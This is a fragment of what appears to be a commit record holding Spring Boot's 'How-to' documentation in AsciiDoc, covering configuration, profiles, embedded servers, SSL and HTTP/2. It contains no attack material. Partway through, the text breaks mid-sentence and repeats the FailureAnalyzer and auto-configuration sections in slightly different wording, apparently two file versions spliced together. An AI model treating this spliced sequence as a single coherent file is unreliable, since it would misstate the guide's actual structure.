kson\/spring-boot,yangdd1205\/spring-boot,Buzzardo\/spring-boot,htynkn\/spring-boot,wilkinsona\/spring-boot,jxblum\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,aahlenst\/spring-boot,philwebb\/spring-boot,spring-projects\/spring-boot,jxblum\/spring-boot,mdeinum\/spring-boot,Buzzardo\/spring-boot,chrylis\/spring-boot,spring-projects\/spring-boot,scottfrederick\/spring-boot,wilkinsona\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,mbenson\/spring-boot,htynkn\/spring-boot,mbenson\/spring-boot,mbenson\/spring-boot,htynkn\/spring-boot","old_file":"spring-boot-project\/spring-boot-docs\/src\/docs\/asc
iidoc\/howto.adoc","new_file":"spring-boot-project\/spring-boot-docs\/src\/docs\/asciidoc\/howto.adoc","new_contents":"[[howto]]\n= \"`How-to`\" Guides\ninclude::attributes.adoc[]\n\nThis section provides answers to some common '`how do I do that...`' questions that often arise when using Spring Boot.\nIts coverage is not exhaustive, but it does cover quite a lot.\n\nIf you have a specific problem that we do not cover here, you might want to check out https:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has already provided an answer.\nThis is also a great place to ask new questions (please use the `spring-boot` tag).\n\nWe are also more than happy to extend this section.\nIf you want to add a '`how-to`', send us a {spring-boot-code}[pull request].\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot Application\nThis section includes topics relating directly to Spring Boot applications.\n\n\n\n[[howto-failure-analyzer]]\n=== Create Your Own FailureAnalyzer\n{spring-boot-module-api}\/diagnostics\/FailureAnalyzer.html[`FailureAnalyzer`] is a great way to intercept an exception on startup and turn it into a human-readable message, wrapped in a {spring-boot-module-api}\/diagnostics\/FailureAnalysis.html[`FailureAnalysis`].\nSpring Boot provides such an analyzer for application-context-related exceptions, JSR-303 validations, and more.\nYou can also create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks the presence of a specified exception type in the exception to handle.\nYou can extend from that so that your implementation gets a chance to handle the exception only when it is actually present.\nIf, for whatever reason, you cannot handle the exception, return `null` to give another implementation a chance to handle the exception.\n\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`.\nThe following example registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\nNOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer` can simply implement `BeanFactoryAware` or `EnvironmentAware` respectively.\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot Auto-configuration\nThe Spring Boot auto-configuration tries its best to \"`do the right thing`\", but sometimes things fail, and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot `ApplicationContext`.\nYou can see it if you enable `DEBUG` logging output.\nIf you use the `spring-boot-actuator` (see <<production-ready-features.adoc#production-ready,the Actuator chapter>>), there is also a `conditions` endpoint that renders the report in JSON.\nUse that endpoint to debug the application and see what features have been added (and which have not been added) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc.\nWhen reading the code, remember the following rules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources.\n Pay special attention to the `+@Conditional*+` annotations to find out what features they enable and when.\n Add `--debug` to the command line or a System property `-Ddebug` to get a log on the console of all the auto-configuration decisions that were made in your 
\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`.\nThe following example registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\nNOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer` can simply implement `BeanFactoryAware` or `EnvironmentAware`, respectively.\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot Auto-configuration\nThe Spring Boot auto-configuration tries its best to \"`do the right thing`\", but sometimes things fail, and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot `ApplicationContext`.\nYou can see it if you enable `DEBUG` logging output.\nIf you use the `spring-boot-actuator` (see <<production-ready-features.adoc#production-ready,the Actuator chapter>>), there is also a `conditions` endpoint that renders the report in JSON.\nUse that endpoint to debug the application and see what features have been added (and which have not been added) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc.\nWhen reading the code, remember the following rules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources.\n Pay special attention to the `+@Conditional*+` annotations to find out what features they enable and when.\n Add `--debug` to the command line or a System property `-Ddebug` to get a log on the console of all the auto-configuration decisions that were made in your app.\n In a running application with actuator enabled, look at the `conditions` endpoint (`\/actuator\/conditions` or the JMX equivalent) for the same information.\n* Look for classes that are `@ConfigurationProperties` (such as {spring-boot-autoconfigure-module-code}\/web\/ServerProperties.java[`ServerProperties`]) and read from there the available external configuration options.\n The `@ConfigurationProperties` annotation has a `name` attribute that acts as a prefix to external properties.\n Thus, `ServerProperties` has `prefix=\"server\"` and its configuration properties are `server.port`, `server.address`, and others.\n In a running application with actuator enabled, look at the `configprops` endpoint.\n* Look for uses of the `bind` method on the `Binder` to pull configuration values explicitly out of the `Environment` in a relaxed manner.\n It is often used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`.\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in response to SpEL expressions, normally evaluated with placeholders resolved from the `Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext Before It Starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that are used to apply customizations to the context or environment.\nSpring Boot loads a number of such customizations for use internally from `META-INF\/spring.factories`.\nThere is more than one way to register additional customizations:\n\n* Programmatically, per application, by calling the `addListeners` and `addInitializers` methods on `SpringApplication` before you run it.\n* Declaratively, per application, by setting the `context.initializer.classes` or `context.listener.classes` properties.\n* Declaratively, for all applications, by adding a `META-INF\/spring.factories` file and packaging a jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (some even before the context is created) and then registers the listeners for events published by the `ApplicationContext` as well.\nSee \"`<<spring-boot-features.adoc#boot-features-application-events-and-listeners,Application Events and Listeners>>`\" in the '`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is refreshed by using `EnvironmentPostProcessor`.\nEach implementation should be registered in `META-INF\/spring.factories`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`.\nFor instance, the following example loads a YAML configuration file from the classpath:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` has already been prepared with all the usual property sources that Spring Boot loads by default.\nIt is therefore possible to get the location of the file from the environment.\nThe preceding example adds the `custom-resource` property source at the end of the list so that a key defined in any of the usual other locations takes precedence.\nA custom implementation may define another order.\n\nCAUTION: While using 
`@PropertySource` on your `@SpringBootApplication` may seem to be a convenient way to load a custom resource in the `Environment`, we do not recommend it.\nSuch property sources are not added to the `Environment` until the application context is being refreshed.\nThis is too late to configure certain properties such as `+logging.*+` and `+spring.main.*+` which are read before refresh begins.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext Hierarchy (Adding a Parent or Root Context)\nYou can use the `SpringApplicationBuilder` class to create parent\/child `ApplicationContext` hierarchies.\nSee \"`<<spring-boot-features.adoc#boot-features-fluent-builder-api>>`\" in the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a Non-web Application\nNot all Spring applications have to be web applications (or web services).\nIf you want to execute some code in a `main` method but also bootstrap a Spring application to set up the infrastructure to use, you can use the `SpringApplication` features of Spring Boot.\nA `SpringApplication` changes its `ApplicationContext` class, depending on whether it thinks it needs a web application or not.\nThe first thing you can do to help it is to leave server-related dependencies (such as the servlet API) off the classpath.\nIf you cannot do that (for example, you run two applications from the same code base), then you can explicitly call `setWebApplicationType(WebApplicationType.NONE)` on your `SpringApplication` instance or set the `applicationContextClass` property (through the Java API or with external properties).\nApplication code that you want to run as your business logic can be implemented as a `CommandLineRunner` and dropped into the context as a `@Bean` definition.\n
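\nAs a rough sketch (the class and bean names here are illustrative), such an application might look like the following:\n\n[source,java,indent=0]\n----\n\t@SpringBootApplication\n\tpublic class MyBatchApplication {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tnew SpringApplicationBuilder(MyBatchApplication.class)\n\t\t\t\t\t.web(WebApplicationType.NONE)\n\t\t\t\t\t.run(args);\n\t\t}\n\n\t\t\/\/ Business logic, executed once the context has started\n\t\t@Bean\n\t\tpublic CommandLineRunner businessLogic() {\n\t\t\treturn (args) -> System.out.println(\"Running business logic...\");\n\t\t}\n\n\t}\n----\n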
\n\n\n[[howto-properties-and-configuration]]\n== Properties and Configuration\nThis section includes topics about setting and reading properties and configuration settings and their interaction with Spring Boot applications.\n\n\n\n[[howto-automatic-expansion]]\n=== Automatically Expand Properties at Build Time\nRather than hardcoding some properties that are also specified in your project's build configuration, you can automatically expand them by instead using the existing build configuration.\nThis is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic Property Expansion Using Maven\nYou can automatically expand properties from the Maven project by using resource filtering.\nIf you use the `spring-boot-starter-parent`, you can then refer to your Maven '`project properties`' with `@..@` placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (in other words, no filtering is applied on `src\/test\/resources`).\n\nTIP: If you enable the `addResources` flag, the `spring-boot:run` goal can add `src\/main\/resources` directly to the classpath (for hot reloading purposes).\nDoing so circumvents the resource filtering and this feature.\nInstead, you can use the `exec:java` goal or customize the plugin's configuration.\nSee the {spring-boot-maven-plugin-docs}#getting-started[plugin usage page] for more details.\n\nIf you do not use the starter parent, you need to include the following element inside the `<build\/>` element of your `pom.xml`:\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nYou also need to include the following element inside `<plugins\/>`:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you use standard Spring placeholders (such as `$\\{placeholder}`) in your configuration.\nIf that property is not set to `false`, these may be expanded by the build.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic Property Expansion Using Gradle\nYou can automatically expand properties from the Gradle project by configuring the Java plugin's `processResources` task to do so, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties by using placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine`, which transforms `${..}` tokens.\nThe `${..}` style conflicts with Spring's own property placeholder mechanism.\nTo use Spring property placeholders together with automatic expansion, escape the Spring property placeholders as follows: `\\${..}`.\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the Configuration of SpringApplication\nA `SpringApplication` has bean properties (mainly setters), so you can use its Java API as you create the application to modify its behavior.\nAlternatively, you can externalize the configuration by setting properties in `+spring.main.*+`.\nFor example, in `application.properties`, you might have the following settings:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.main.web-application-type=none\n\tspring.main.banner-mode=off\n----\n\nThen the Spring Boot banner is not printed on startup, and the application does not start an embedded web server.\n\nProperties defined in external configuration override the values specified with the Java API, with the notable exception of the sources used to create the `ApplicationContext`.\nConsider the following application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nNow consider the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application _now_ shows the banner (as overridden by configuration) and uses three sources for the `ApplicationContext` (in the following order): `demo.MyApp`, `com.acme.Config`, and `com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the Location of External Properties of an Application\nBy default, properties from different sources are added to the Spring `Environment` in a defined order (see 
\"`<<spring-boot-features.adoc#boot-features-external-config>>`\" in the '`Spring Boot features`' section for the exact order).\n\nYou can also provide the following System properties (or environment variables) to change the behavior:\n\n* configprop:spring.config.name[] (configprop:spring.config.name[format=envvar]): Defaults to `application` as the root of the file name.\n* configprop:spring.config.location[] (configprop:spring.config.location[format=envvar]): The file to load (such as a classpath resource or a URL).\n A separate `Environment` property source is set up for this document and it can be overridden by system properties, environment variables, or the command line.\n\nNo matter what you set in the environment, Spring Boot always loads `application.properties` as described above.\nBy default, if YAML is used, then files with the '`.yml`' extension are also added to the list.\n\nSpring Boot logs the configuration files that are loaded at the `DEBUG` level and the candidates it has not found at `TRACE` level.\n\nSee {spring-boot-module-code}\/context\/config\/ConfigFileApplicationListener.java[`ConfigFileApplicationListener`] for more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`Short`' Command Line Arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to set configuration properties on the command line.\nYou can enable this behavior by using placeholders in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you inherit from the `spring-boot-starter-parent` POM, the default filter token of the `maven-resources-plugins` has been changed from `+${*}+` to `@` (that is, `@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style placeholders.\nIf you have enabled Maven filtering for the `application.properties` directly, you may want to also change the default filter token to use https:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other delimiters].\n\nNOTE: In this specific case, the port binding works in a PaaS environment such as Heroku or Cloud Foundry.\nIn those two platforms, the `PORT` environment variable is set automatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for External Properties\nYAML is a superset of JSON and, as such, is a convenient syntax for storing external properties in a hierarchical format, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and put it in the root of your classpath.\nThen add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already included if you use the `spring-boot-starter`).\nA YAML file is parsed to a Java `Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it is one level deep and has period-separated keys, as many people are used to with `Properties` files in Java.\n\nThe preceding example YAML corresponds to the following `application.properties` 
file:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driver-class-name=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee \"`<<spring-boot-features.adoc#boot-features-external-config-yaml>>`\" in the '`Spring Boot features`' section for more information about YAML.\n\n\n\n[[howto-set-active-spring-profiles]]\n=== Set the Active Spring Profiles\nThe Spring `Environment` has an API for this, but you would normally set a System property (configprop:spring.profiles.active[]) or an OS environment variable (configprop:spring.profiles.active[format=envvar]).\nAlso, you can launch your application with a `-D` argument (remember to put it before the main class or jar archive), as follows:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot, you can also set the active profile in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting but not by the `SpringApplicationBuilder.profiles()` method.\nThus, the latter Java API can be used to augment the profiles without changing the defaults.\n\nSee \"`<<spring-boot-features.adoc#boot-features-profiles>>`\" in the \"`Spring Boot features`\" section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change Configuration Depending on the Environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each document is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value (a comma-separated list of profiles) is fed into the Spring `Environment.acceptsProfiles()` method.\nIf any of those profiles is active, that document is included in the final merge (otherwise, it is not), as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn the preceding example, the default port is 9000.\nHowever, if the Spring profile called '`development`' is active, then the port is 9001.\nIf '`production`' is active, then the port is 0.\n\nNOTE: The YAML documents are merged in the order in which they are encountered.\nLater values override earlier values.\n\nTo do the same thing with properties files, you can use `application-$\\{profile}.properties` to specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover Built-in Options for External Properties\nSpring Boot binds external properties from `application.properties` (or `.yml` files and other places) into an application at runtime.\nThere is not (and technically cannot be) an exhaustive list of all supported properties in a single location, because contributions can come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows all the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an 
<<appendix-application-properties.adoc#common-application-properties, `application.properties`>> example with a list of the most common properties supported by Spring Boot.\nThe definitive list comes from searching the source code for `@ConfigurationProperties` and `@Value` annotations as well as the occasional use of `Binder`.\nFor more about the exact ordering of loading properties, see \"<<spring-boot-features#boot-features-external-config>>\".\n\n\n\n[[howto-embedded-web-servers]]\n== Embedded Web Servers\nEach Spring Boot web application includes an embedded web server.\nThis feature leads to a number of how-to questions, including how to change the embedded server and how to configure the embedded server.\nThis section answers those questions.\n\n\n\n[[howto-use-another-web-server]]\n=== Use Another Web Server\nMany Spring Boot starters include default embedded containers.\n\n* For servlet stack applications, the `spring-boot-starter-web` includes Tomcat by including `spring-boot-starter-tomcat`, but you can use `spring-boot-starter-jetty` or `spring-boot-starter-undertow` instead.\n* For reactive stack applications, the `spring-boot-starter-webflux` includes Reactor Netty by including `spring-boot-starter-reactor-netty`, but you can use `spring-boot-starter-tomcat`, `spring-boot-starter-jetty`, or `spring-boot-starter-undertow` instead.\n\nWhen switching to a different HTTP server, you need to exclude the default dependencies in addition to including the one you need.\nSpring Boot provides separate starters for HTTP servers to help make this process as easy as possible.\n\nThe following Maven example shows how to exclude Tomcat and include Jetty for Spring MVC:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<servlet-api.version>3.1.0<\/servlet-api.version>\n\t<\/properties>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<!-- Exclude the Tomcat dependency -->\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<!-- Use Jetty instead -->\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The version of the Servlet API has been overridden as, unlike Tomcat 9 and Undertow 2.0, Jetty 9.4 does not support Servlet 4.0.\n\nThe following Gradle example shows how to exclude Netty and include Undertow for Spring WebFlux:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\timplementation('org.springframework.boot:spring-boot-starter-webflux') {\n\t\t exclude group: 'org.springframework.boot', module: 'spring-boot-starter-reactor-netty'\n\t\t}\n\t\t\/\/ Use Undertow instead\n\t\timplementation 'org.springframework.boot:spring-boot-starter-undertow'\n\t\t\/\/ ...\n\t}\n----\n\nNOTE: `spring-boot-starter-reactor-netty` is required to use the `WebClient` class, so you may need to keep a dependency on Netty even when you need to include a different HTTP server.\n\n\n\n[[howto-disable-web-server]]\n=== Disabling the Web Server\nIf your classpath contains the necessary bits to start a web server, Spring Boot will automatically start it.\nTo disable this behavior configure the `WebApplicationType` in your `application.properties`, as shown in the following 
example:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.main.web-application-type=none\n----\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP Port\nIn a standalone application, the main HTTP port defaults to `8080` but can be set with configprop:server.port[] (for example, in `application.properties` or as a System property).\nThanks to relaxed binding of `Environment` values, you can also use configprop:server.port[format=envvar] (for example, as an OS environment variable).\n\nTo switch off the HTTP endpoints completely but still create a `WebApplicationContext`, use `server.port=-1` (doing so is sometimes useful for testing).\n\nFor more details, see \"`<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>`\" in the '`Spring Boot Features`' section, or the {spring-boot-autoconfigure-module-code}\/web\/ServerProperties.java[`ServerProperties`] source code.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a Random Unassigned HTTP Port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP Port at Runtime\nYou can access the port the server is running on from log output or from the `ServletWebServerApplicationContext` through its `WebServer`.\nThe best way to get that and be sure that it has been initialized is to add a `@Bean` of type `ApplicationListener<ServletWebServerInitializedEvent>` and pull the container out of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can also inject the actual port into a field by using the `@LocalServerPort` annotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tServletWebServerApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`.\nDo not try to inject the port in a regular application.\nAs we just saw, the value is set only after the container has been initialized.\nContrary to a test, application code callbacks are processed early (before the value is actually available).\n====\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP Response Compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow.\nIt can be enabled in `application.properties`, as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be performed.\nYou can configure this behavior by setting the configprop:server.compression.min-response-size[] property.\n\nBy default, responses are compressed only if their content type is one of the following:\n\n* `text\/html`\n* `text\/xml`\n* `text\/plain`\n* `text\/css`\n* `text\/javascript`\n* `application\/javascript`\n* `application\/json`\n* `application\/xml`\n\nYou can configure this behavior by setting the configprop:server.compression.mime-types[] property.\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties, typically in `application.properties` or `application.yml`.\nThe following example shows setting SSL properties in 
`application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {spring-boot-module-code}\/web\/server\/Ssl.java[`Ssl`] for details of all of the supported properties.\n\nUsing configuration such as the preceding example means the application no longer supports a plain HTTP connector at port 8080.\nSpring Boot does not support the configuration of both an HTTP connector and an HTTPS connector through `application.properties`.\nIf you want to have both, you need to configure one of them programmatically.\nWe recommend using `application.properties` to configure HTTPS, as the HTTP connector is the easier of the two to configure programmatically.\n\n\n\n[[howto-configure-http2]]\n=== Configure HTTP\/2\nYou can enable HTTP\/2 support in your Spring Boot application with the configprop:server.http2.enabled[] configuration property.\nThis support depends on the chosen web server and the application environment, since that protocol is not supported out-of-the-box by JDK 8.\n\n[NOTE]\n====\nSpring Boot does not support `h2c`, the cleartext version of the HTTP\/2 protocol.\nSo you must <<howto-configure-ssl, configure SSL first>>.\n====\n\n\n\n[[howto-configure-http2-undertow]]\n==== HTTP\/2 with Undertow\nAs of Undertow 1.4.0+, HTTP\/2 is supported without any additional requirement on JDK 8.\n\n\n\n[[howto-configure-http2-jetty]]\n==== HTTP\/2 with Jetty\nAs of Jetty 9.4.8, HTTP\/2 is also supported with the https:\/\/www.conscrypt.org\/[Conscrypt library].\nTo enable that support, your application needs to have two additional dependencies: `org.eclipse.jetty:jetty-alpn-conscrypt-server` and `org.eclipse.jetty.http2:http2-server`.\n
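\nIn Maven, for example, they might be declared as follows (the versions are typically managed by Spring Boot's dependency management):\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.eclipse.jetty<\/groupId>\n\t\t<artifactId>jetty-alpn-conscrypt-server<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.eclipse.jetty.http2<\/groupId>\n\t\t<artifactId>http2-server<\/artifactId>\n\t<\/dependency>\n----\n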
\n\n\n[[howto-configure-http2-tomcat]]\n==== HTTP\/2 with Tomcat\nSpring Boot ships by default with Tomcat 9.0.x, which supports HTTP\/2 out of the box when using JDK 9 or later.\nAlternatively, HTTP\/2 can be used on JDK 8 if the `libtcnative` library and its dependencies are installed on the host operating system.\n\nThe library directory must be made available, if not already, to the JVM library path.\nYou can do so with a JVM argument such as `-Djava.library.path=\/usr\/local\/opt\/tomcat-native\/lib`.\nMore on this in the https:\/\/tomcat.apache.org\/tomcat-9.0-doc\/apr.html[official Tomcat documentation].\n\nStarting Tomcat 9.0.x on JDK 8 without that native support logs the following error:\n\n[indent=0,subs=\"attributes\"]\n----\n\tERROR 8787 --- [ main] o.a.coyote.http11.Http11NioProtocol : The upgrade handler [org.apache.coyote.http2.Http2Protocol] for [h2] only supports upgrade via ALPN but has been configured for the [\"https-jsse-nio-8443\"] connector that does not support ALPN.\n----\n\nThis error is not fatal, and the application still starts with HTTP\/1.1 SSL support.\n\n\n\n[[howto-configure-http2-netty]]\n==== HTTP\/2 with Reactor Netty\nThe `spring-boot-starter-webflux` uses Reactor Netty as a server by default.\nReactor Netty can be configured for HTTP\/2 using the JDK support with JDK 9 or later.\nFor JDK 8 environments, or for optimal runtime performance, this server also supports HTTP\/2 with native libraries.\nTo enable that, your application needs to have an additional dependency.\n\nSpring Boot manages the version for the `io.netty:netty-tcnative-boringssl-static` \"uber jar\", containing native libraries for all platforms.\nDevelopers can choose to import only the required dependencies using a classifier (see https:\/\/netty.io\/wiki\/forked-tomcat-native.html[the Netty official documentation]).\n\n\n\n[[howto-configure-webserver]]\n=== Configure the Web Server\nGenerally, you should first consider using one of the many available configuration keys and customize your web server by adding new entries in your `application.properties` (or `application.yml`, environment variables, and so on; see \"`<<howto-discover-build-in-options-for-external-properties>>`\").\nThe `server.{asterisk}` namespace is quite useful here, and it includes namespaces like `server.tomcat.{asterisk}`, `server.jetty.{asterisk}` and others, for server-specific features.\nSee the list of <<appendix-application-properties.adoc#common-application-properties>>.\n\nThe previous sections already covered many common use cases, such as compression, SSL, or HTTP\/2.\nHowever, if a configuration key does not exist for your use case, you should then look at {spring-boot-module-api}\/web\/server\/WebServerFactoryCustomizer.html[`WebServerFactoryCustomizer`].\nYou can declare such a component and get access to the server factory relevant to your choice: you should select the variant for the chosen server (Tomcat, Jetty, Reactor Netty, Undertow) and the chosen web stack (Servlet or Reactive).\n\nThe example below is for Tomcat with the `spring-boot-starter-web` (Servlet stack):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class MyTomcatWebServerCustomizer\n\t\t\timplements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {\n\n\t\t@Override\n\t\tpublic void customize(TomcatServletWebServerFactory factory) {\n\t\t\t\/\/ customize the factory here\n\t\t}\n\t}\n----\n\nIn addition, Spring Boot provides:\n\n[[howto-configure-webserver-customizers]]\n[cols=\"1,2,2\", options=\"header\"]\n|===\n| Server | Servlet stack | Reactive stack\n\n| Tomcat\n| `TomcatServletWebServerFactory`\n| `TomcatReactiveWebServerFactory`\n\n| Jetty\n| `JettyServletWebServerFactory`\n| `JettyReactiveWebServerFactory`\n\n| Undertow\n| `UndertowServletWebServerFactory`\n| `UndertowReactiveWebServerFactory`\n\n| Reactor\n| N\/A\n| 